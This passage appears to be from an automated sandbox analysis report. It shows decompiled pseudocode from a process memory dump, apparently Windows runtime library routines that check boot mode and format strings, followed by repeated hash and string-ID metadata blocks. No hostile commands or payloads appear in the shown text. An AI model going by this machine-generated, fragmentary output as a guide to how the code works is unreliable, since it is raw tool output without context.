                                                          					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                          					_t74 = E01883690(1, _t117, 0x1841810, _t118 - 0x74);
                                                          					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                          					_t101 = _t117[2];
                                                          					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                          					if(_t74 < 0) {
                                                          						_t64 =  *_t117 & 0x0000ffff;
                                                          						_t115 =  *(_t118 - 0x7c);
                                                          						goto L20;
                                                          					}
                                                          					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                          					_t115 =  *(_t118 - 0x7c);
                                                          					goto L21;
                                                          				}
                                                          				if(_t103 == 1) {
                                                          					_t105 = 4;
                                                          					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                          					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                          					_push(_t118 - 0x70);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(_t105);
                                                          					_push(_t118 - 0x78);
                                                          					_push(0x6b);
                                                          					 *((intOrPtr*)(_t118 - 0x64)) = E018AAA90();
                                                          					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                          					_t113 = L01884620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                          					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                          					if(_t113 != 0) {
                                                          						_push(_t118 - 0x70);
                                                          						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                          						_push(_t113);
                                                          						_push(4);
                                                          						_push(_t118 - 0x78);
                                                          						_push(0x6b);
                                                          						_t84 = E018AAA90();
                                                          						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                          						if(_t84 < 0) {
                                                          							goto L29;
                                                          						}
                                                          						_t110 = 0;
                                                          						_t106 = 0;
                                                          						while(1) {
                                                          							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                          							 *(_t118 - 0x88) = _t106;
                                                          							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                          								break;
                                                          							}
                                                          							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                          							_t106 = _t106 + 1;
                                                          						}
                                                          						_t88 = E018E500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                          						_t119 = _t119 + 0x1c;
                                                          						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                          						if(_t88 < 0) {
                                                          							goto L29;
                                                          						}
                                                          						_t101 = _t118 - 0x3c;
                                                          						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                          						goto L21;
                                                          					}
                                                          					_t67 = 0xc0000017;
                                                          					goto L28;
                                                          				}
                                                          				_push(0);
                                                          				_push(0x20);
                                                          				_push(_t118 - 0x60);
                                                          				_push(0x5a);
                                                          				_t94 = E018A9860();
                                                          				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                          				if(_t94 < 0) {
                                                          					goto L29;
                                                          				}
                                                          				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                          					_t101 = L"Legacy";
                                                          					_push(6);
                                                          				} else {
                                                          					_t101 = L"UEFI";
                                                          					_push(4);
                                                          				}
                                                          				_pop(_t65);
                                                          				goto L21;
                                                          			}






















                                                          0x018e51be
                                                          0x018e51c3
                                                          0x018e51c8
                                                          0x018e51cd
                                                          0x018e51d0
                                                          0x018e51d3
                                                          0x018e51d8
                                                          0x018e51db
                                                          0x018e51de
                                                          0x018e51e0
                                                          0x018e51e3
                                                          0x018e51e6
                                                          0x018e51e8
                                                          0x018e5342
                                                          0x018e5351
                                                          0x018e5356
                                                          0x018e535a
                                                          0x018e5360
                                                          0x018e5363
                                                          0x018e5366
                                                          0x018e5369
                                                          0x018e5369
                                                          0x018e536b
                                                          0x018e536b
                                                          0x018e5370
                                                          0x018e53a3
                                                          0x018e53a4
                                                          0x018e53a6
                                                          0x018e53ab
                                                          0x018e53ab
                                                          0x018e53ae
                                                          0x018e53ae
                                                          0x018e53b5
                                                          0x018e53bf
                                                          0x018e53bf
                                                          0x018e5375
                                                          0x018e5396
                                                          0x018e53a0
                                                          0x018e53a0
                                                          0x00000000
                                                          0x018e5396
                                                          0x018e5377
                                                          0x018e5379
                                                          0x018e537f
                                                          0x018e538c
                                                          0x018e5390
                                                          0x00000000
                                                          0x018e5390
                                                          0x018e51ee
                                                          0x018e51f1
                                                          0x018e5301
                                                          0x018e5310
                                                          0x018e5315
                                                          0x018e5318
                                                          0x018e531b
                                                          0x018e5320
                                                          0x018e532e
                                                          0x018e5331
                                                          0x00000000
                                                          0x018e5331
                                                          0x018e5328
                                                          0x018e5329
                                                          0x00000000
                                                          0x018e5329
                                                          0x018e51fa
                                                          0x018e5235
                                                          0x018e5236
                                                          0x018e5239
                                                          0x018e523f
                                                          0x018e5240
                                                          0x018e5241
                                                          0x018e5242
                                                          0x018e5246
                                                          0x018e5247
                                                          0x018e524e
                                                          0x018e5251
                                                          0x018e5267
                                                          0x018e5269
                                                          0x018e526e
                                                          0x018e527d
                                                          0x018e527e
                                                          0x018e5281
                                                          0x018e5282
                                                          0x018e5287
                                                          0x018e5288
                                                          0x018e528a
                                                          0x018e528f
                                                          0x018e5294
                                                          0x00000000
                                                          0x00000000
                                                          0x018e529a
                                                          0x018e529c
                                                          0x018e529e
                                                          0x018e529e
                                                          0x018e52a4
                                                          0x018e52b0
                                                          0x00000000
                                                          0x00000000
                                                          0x018e52ba
                                                          0x018e52bc
                                                          0x018e52bc
                                                          0x018e52d4
                                                          0x018e52d9
                                                          0x018e52dc
                                                          0x018e52e1
                                                          0x00000000
                                                          0x00000000
                                                          0x018e52e7
                                                          0x018e52f4
                                                          0x00000000
                                                          0x018e52f4
                                                          0x018e5270
                                                          0x00000000
                                                          0x018e5270
                                                          0x018e51fc
                                                          0x018e51fd
                                                          0x018e5202
                                                          0x018e5203
                                                          0x018e5205
                                                          0x018e520a
                                                          0x018e520f
                                                          0x00000000
                                                          0x00000000
                                                          0x018e521b
                                                          0x018e5226
                                                          0x018e522b
                                                          0x018e521d
                                                          0x018e521d
                                                          0x018e5222
                                                          0x018e5222
                                                          0x018e522d
                                                          0x00000000

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: Legacy$UEFI
                                                          • API String ID: 2994545307-634100481
                                                          • Opcode ID: 2f9bbdf12dc533f0597e9a2fa716e5a3e402f61175346db58c91dc11b89b70c2
                                                          • Instruction ID: 4ba6ab2a36fe035ab3133ebc188fd465fb4faadcbf3ebcd300ec25e1ecb6a756
                                                          • Opcode Fuzzy Hash: 2f9bbdf12dc533f0597e9a2fa716e5a3e402f61175346db58c91dc11b89b70c2
                                                          • Instruction Fuzzy Hash: 5D516D75E006099FDB24DFA8C894AADBBF8FF4A708F14402DE659EB251DB71DA00CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0188B9A5
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID:
                                                          • API String ID: 885266447-0
                                                          • Opcode ID: 7dc4319d01f13d5cffbaab364643817ba8252a5e95f474018ee62e6d7e33aa70
                                                          • Instruction ID: 0a80ba4f8b016b55afdae9fa3b1c90fa060ef7d724072c54236490efae6d86b2
                                                          • Opcode Fuzzy Hash: 7dc4319d01f13d5cffbaab364643817ba8252a5e95f474018ee62e6d7e33aa70
                                                          • Instruction Fuzzy Hash: 1A515571A09341CFC720EF29C48092AFBE5BBC8714F14896EE696D7345E770EA44CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID: _vswprintf_s
                                                          • String ID:
                                                          • API String ID: 677850445-0
                                                          • Opcode ID: 5d0a76d39bfa67c58fd5e14ce98dd27cadbf88c1ed1b09ae17861da7a76c4e71
                                                          • Instruction ID: e56269701cfeb93356aba73d88b1703a0427000ed903db8781173a00ed40456b
                                                          • Opcode Fuzzy Hash: 5d0a76d39bfa67c58fd5e14ce98dd27cadbf88c1ed1b09ae17861da7a76c4e71
                                                          • Instruction Fuzzy Hash: EF51C471D002699BEF31CF68C8547EEBBB0EF04B14F1042ADE859D7292D7718A85CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PATH
                                                          • API String ID: 0-1036084923
                                                          • Opcode ID: 9e284a87d900e8f05abc5840c8f2ac7933b638f78c99629911202d1955ef0037
                                                          • Instruction ID: 7f63086e72d3324f2c2e74cded30d9b7cd8652711d2a7c200b5fd88e7f119fbe
                                                          • Opcode Fuzzy Hash: 9e284a87d900e8f05abc5840c8f2ac7933b638f78c99629911202d1955ef0037
                                                          • Instruction Fuzzy Hash: 12C17F75D00219ABDF25DF9DD881ABDBBB6FF48744F484029E901FB250D734AA41CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 018DBE0F
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                          • API String ID: 0-865735534
                                                          • Opcode ID: 62b1ed83ad869cfab6148b81e6f64308911eafc4d06980775d062706047e2c18
                                                          • Instruction ID: dde53ce62d7e5d6f6456af931e0a83f5cf48fe8832373d0e41ce184972d1c163
                                                          • Opcode Fuzzy Hash: 62b1ed83ad869cfab6148b81e6f64308911eafc4d06980775d062706047e2c18
                                                          • Instruction Fuzzy Hash: 3DA12631B007568BEF29DF6CC45077ABBA4AF49718F094569EB06DB681DB34DB01CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Re-Waiting
                                                          • API String ID: 0-316354757
                                                          • Opcode ID: b17c1542d317a75471e8986ffa86ce9d949a1223c042e3c1bb31f7baa5a6d39e
                                                          • Instruction ID: 0dc28924f79e1251aaa62d630a95c8308f139aa48c5fe544687591111fcb2841
                                                          • Opcode Fuzzy Hash: b17c1542d317a75471e8986ffa86ce9d949a1223c042e3c1bb31f7baa5a6d39e
                                                          • Instruction Fuzzy Hash: 2161F771A006499FEB26DF6CCC80BBEBBAAEB44718F1446A9D611D73C2C7349B00C791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `
                                                          • API String ID: 0-2679148245
                                                          • Opcode ID: 9c5331e5d68d0bb927db4702f98fb23e7b6790f733a4ae797644281e4b2fbf8f
                                                          • Instruction ID: e9222b16dd4e708688744efbc9b09e611079b62d5b552d6e33e06a867af90596
                                                          • Opcode Fuzzy Hash: 9c5331e5d68d0bb927db4702f98fb23e7b6790f733a4ae797644281e4b2fbf8f
                                                          • Instruction Fuzzy Hash: 0B5191713083429FD325DF28D880B1BBBE9EBC4714F04092CF99A97290D771E905C762
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                          • Instruction ID: 7ce6ac3c4ecc723818fff0d2185f27e6f1bffd028795d7eebb7978d501794b7c
                                                          • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                          • Instruction Fuzzy Hash: CA516971504715ABD321DF29C840A6BBBF8FF48714F00892EFA95C7690E7B4EA04CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: BinaryHash
                                                          • API String ID: 0-2202222882
                                                          • Opcode ID: 9f4361ce77d977832d771d858460353faf25c73ff9f7cb927edebc88b05982ff
                                                          • Instruction ID: 8b2a0de304c2ac57470cd7420608316886abfc4eaf44f3b06b64c5fececa6abf
                                                          • Opcode Fuzzy Hash: 9f4361ce77d977832d771d858460353faf25c73ff9f7cb927edebc88b05982ff
                                                          • Instruction Fuzzy Hash: 5B4143B1D0052D9BDB219A64CC84FDEB77CAB45714F0045A5EB09EB251DB309F88CF95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `
                                                          • API String ID: 0-2679148245
                                                          • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                          • Instruction ID: 2820e240365edd2f2bda7a33108494e13ed96abb47dd8e225d8b1b516229a8fd
                                                          • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                          • Instruction Fuzzy Hash: C4310432604746ABE710DE29CC44F977BD9FBC4758F184229FA58DB284D770E904C791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: BinaryName
                                                          • API String ID: 0-215506332
                                                          • Opcode ID: 14daba865223185b90a73240c82b0850fea306ce761dc6eb2a91c741445baa97
                                                          • Instruction ID: 7f4245656d1f0e0f182dbcfa9c2b15f14ef1844f787f2bde241ee44e9478a320
                                                          • Opcode Fuzzy Hash: 14daba865223185b90a73240c82b0850fea306ce761dc6eb2a91c741445baa97
                                                          • Instruction Fuzzy Hash: 7431BF7290151AABEB15EA58C949E6ABBB4FB82B20F024169AD14E7251D7309F00C7A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: d96566d169c6af375d0367e17de046fe1d0016fd708cad6c27f6b60c6ab23332
                                                          • Instruction ID: fbcb802ea5e43a862c6a8d798125657677f924642947d770f76c0ffbb5b6b838
                                                          • Opcode Fuzzy Hash: d96566d169c6af375d0367e17de046fe1d0016fd708cad6c27f6b60c6ab23332
                                                          • Instruction Fuzzy Hash: 3231B1B15083059FDB11DF6CC98096BBBE8EB95758F440A2EF994C3211E634DE04DB97
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: WindowsExcludedProcs
                                                          • API String ID: 0-3583428290
                                                          • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                          • Instruction ID: 523765eb94f2a35d49295ed393463802c563891a9abfd20dbb77ac8554fa7c5f
                                                          • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                          • Instruction Fuzzy Hash: 3721F97B501229EBEB229A9DC844F6BBBADEF81B54F154425FE14DB600D630DF00DBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Actx
                                                          • API String ID: 0-89312691
                                                          • Opcode ID: 60da99dc48480c758e1245c367a8007555ba691d7db1656c6359b3872668ce64
                                                          • Instruction ID: 486c98e06cc600678ea156ebbc753bab1b1377e2ee99e4edfa5185e83b6c58c4
                                                          • Opcode Fuzzy Hash: 60da99dc48480c758e1245c367a8007555ba691d7db1656c6359b3872668ce64
                                                          • Instruction Fuzzy Hash: B71104343047C68BFB347E1CC9907367695EB86328F25463AE761CB391DB74DA008340
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • Critical error detected %lx, xrefs: 01918E21
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Critical error detected %lx
                                                          • API String ID: 0-802127002
                                                          • Opcode ID: 18f40b8de0ae5a55417435b2bcf2a7a42e62a26005fe7112c922fca8838361a4
                                                          • Instruction ID: 972f47ffbc428337e8d0da8b50de5b920b150edd603f3e9c4ce2a00224ce8359
                                                          • Opcode Fuzzy Hash: 18f40b8de0ae5a55417435b2bcf2a7a42e62a26005fe7112c922fca8838361a4
                                                          • Instruction Fuzzy Hash: C7117571D04348EBEB29DFA88545BDCBBB4AB04315F20422EE528AB382C3346602DF15
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 018FFF60
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                          • API String ID: 0-1911121157
                                                          • Opcode ID: 32e3a33cf7561be3eeafe7ec68ecbe979caa505610c8a5c5c32afe5f16aa1f6c
                                                          • Instruction ID: 831e3012100a1e73cf99a71c8eeae4381927b7c92045c0a9b28a1fa14fcfc00a
                                                          • Opcode Fuzzy Hash: 32e3a33cf7561be3eeafe7ec68ecbe979caa505610c8a5c5c32afe5f16aa1f6c
                                                          • Instruction Fuzzy Hash: 2C11A172950644EFEB26DB58C988F98BBB1FB04718F148058E708E7261CB399B50CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6bb993b904a4583aa946c6464ad7a192330b3f9b68cdb268367885c9087e8d65
                                                          • Instruction ID: 5636c68a202f7ab55abd508d8383ee049443314f82662f143c20135ac7f4c8d5
                                                          • Opcode Fuzzy Hash: 6bb993b904a4583aa946c6464ad7a192330b3f9b68cdb268367885c9087e8d65
                                                          • Instruction Fuzzy Hash: 81426E75D00219DFEB24CF68C880BA9BBB5FF89305F1581AAD94DEB242D7349A85CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f6a38f03256de191da650e45475da6d47c8a65af94471e270a064df4d56572c1
                                                          • Instruction ID: 999f7aa046c065aa0572544b58cdd6cad2b1ca5f183c213184bc630a552356eb
                                                          • Opcode Fuzzy Hash: f6a38f03256de191da650e45475da6d47c8a65af94471e270a064df4d56572c1
                                                          • Instruction Fuzzy Hash: 7EF18E716086128FD724EF18C480B7ABBE1FF98714F14492EF586CB251E734DA91CB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 76bfe5ffe399e4d3802cd05e57a6593e18f87c9c47e224feb08f41df639f2b17
                                                          • Instruction ID: b74f4994d895fb3e794c1a789f224a0196075249f072f29db8b2f4963beb53fc
                                                          • Opcode Fuzzy Hash: 76bfe5ffe399e4d3802cd05e57a6593e18f87c9c47e224feb08f41df639f2b17
                                                          • Instruction Fuzzy Hash: BBF1F771608341AFEB26CF2CC44076BBBE2AF85324F08855EE999DB251D734DA41CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0c4d37a64de1b2c36d9bab10579d69529a810a48ffe0fecfd5967aaf41f95d97
                                                          • Instruction ID: 0a08c00622dc3baf1c6ee60299e62c606d04bb939ec36c1f71f6b09c97374ffb
                                                          • Opcode Fuzzy Hash: 0c4d37a64de1b2c36d9bab10579d69529a810a48ffe0fecfd5967aaf41f95d97
                                                          • Instruction Fuzzy Hash: 9AE1B330A047598FEB35DF6CC980B69BBB2BF85758F044299D909E7291D730EB81CB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: df8c1adfe16adb8eaa24476f80e2170a9c35a78854aa55feee9387a4b47994c6
                                                          • Instruction ID: b41c73b6fb3583dbf219778b5a6c291aabbf5ad9a0c73d5b995faca1e65f46e7
                                                          • Opcode Fuzzy Hash: df8c1adfe16adb8eaa24476f80e2170a9c35a78854aa55feee9387a4b47994c6
                                                          • Instruction Fuzzy Hash: 0CB16B70E04209EFDB29DFE9C988AADBBB5BF49708F10412DE505EB245D770EA41CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 97aa46ec84b49b322393a33803586d2e1fc22407654ad90167a135ea5bfd6b09
                                                          • Instruction ID: da09154dc5ca4e97f90304a87d6a3e165524a789e6ad4beb694554f6f0a4895a
                                                          • Opcode Fuzzy Hash: 97aa46ec84b49b322393a33803586d2e1fc22407654ad90167a135ea5bfd6b09
                                                          • Instruction Fuzzy Hash: 39C102755083818FD755CF28C580A5AFBE1BF88304F284A6EF999CB352D771EA45CB42
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1a3e01d6afa351ae0a42e3b0d2275154dbfe46e56ba3b2463d395857d9a34b0c
                                                          • Instruction ID: 0092e1fdc934b8a7193bc95d799dfe0cf51f5bead616c48475f4d47654287b8e
                                                          • Opcode Fuzzy Hash: 1a3e01d6afa351ae0a42e3b0d2275154dbfe46e56ba3b2463d395857d9a34b0c
                                                          • Instruction Fuzzy Hash: 8C91F531E04359ABEF319B6CC844BAD7BA8AB05728F190265FA11FB6D1D7749F40C781
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c0ef56809f5edc5985fb87b94c90ae1e5396045b6c28d78682d6ef762154efb5
                                                          • Instruction ID: 465286739fd1e6a746fa9342a291a09fbd0013b32aac494c99d7e5184642e707
                                                          • Opcode Fuzzy Hash: c0ef56809f5edc5985fb87b94c90ae1e5396045b6c28d78682d6ef762154efb5
                                                          • Instruction Fuzzy Hash: B48180766443469BDB26CE58C880E7A77E8EB84358F14486EEE45DB245D330EF40CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fd1f4d3db72e2b1d641065ffd57121830c1e68ebb054c49d8028c465e185faa8
                                                          • Instruction ID: 13c74c874d6840b2c4d16b3e361d3b52299aabdafdb20d93db81a96e22111899
                                                          • Opcode Fuzzy Hash: fd1f4d3db72e2b1d641065ffd57121830c1e68ebb054c49d8028c465e185faa8
                                                          • Instruction Fuzzy Hash: BA71FA32200706AFE732DF28C841F66BBA5EB44724F24452CE755DB6A1EB74EA44CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                          • Instruction ID: 1b16d51703cec20119fc3906c4c97c6eff0369b79a465614e108018c6eb567d2
                                                          • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                          • Instruction Fuzzy Hash: 89716171E0021AEFDB10EFA9C984AEEBBF9FF59714F104469E505E7250E734AA41CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6f3f36aa72bfa85f28d363cf3ab61a50ad818a2832c856098a235c0667d1e8a7
                                                          • Instruction ID: ea9af933da02463c488c182343c11072e224e606cc2eabd47bfa65337347c218
                                                          • Opcode Fuzzy Hash: 6f3f36aa72bfa85f28d363cf3ab61a50ad818a2832c856098a235c0667d1e8a7
                                                          • Instruction Fuzzy Hash: 1951BA71105342ABD721EF68C841B27BBE8FF94B94F14091EF499D7651E770EA40CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3d0f7f89fe86c338c60fb6fbe6d358a3fcef67a3d54d93acf2c6c471cdd387a8
                                                          • Instruction ID: 1fd8ab7aaf4cc0d3174c07b54a08cea5147624265ea53c83950ec4fbee46ab3e
                                                          • Opcode Fuzzy Hash: 3d0f7f89fe86c338c60fb6fbe6d358a3fcef67a3d54d93acf2c6c471cdd387a8
                                                          • Instruction Fuzzy Hash: A0519C76A00129DB8F18CF1DC8909BDB7F2BB98704719845AE846EB315D630AA51DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ff76e433a993c56d21ea5927d5d65beebd9c55fdef1b6a9af44a19d407565c86
                                                          • Instruction ID: 9a49a881db697119d89a02bbcbea0e45a7a417ae18a911b204741e598646256a
                                                          • Opcode Fuzzy Hash: ff76e433a993c56d21ea5927d5d65beebd9c55fdef1b6a9af44a19d407565c86
                                                          • Instruction Fuzzy Hash: FE41E7737007219BD726DA29C884F7FB79DAF84611F044619F91E87AD8D738D801C791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
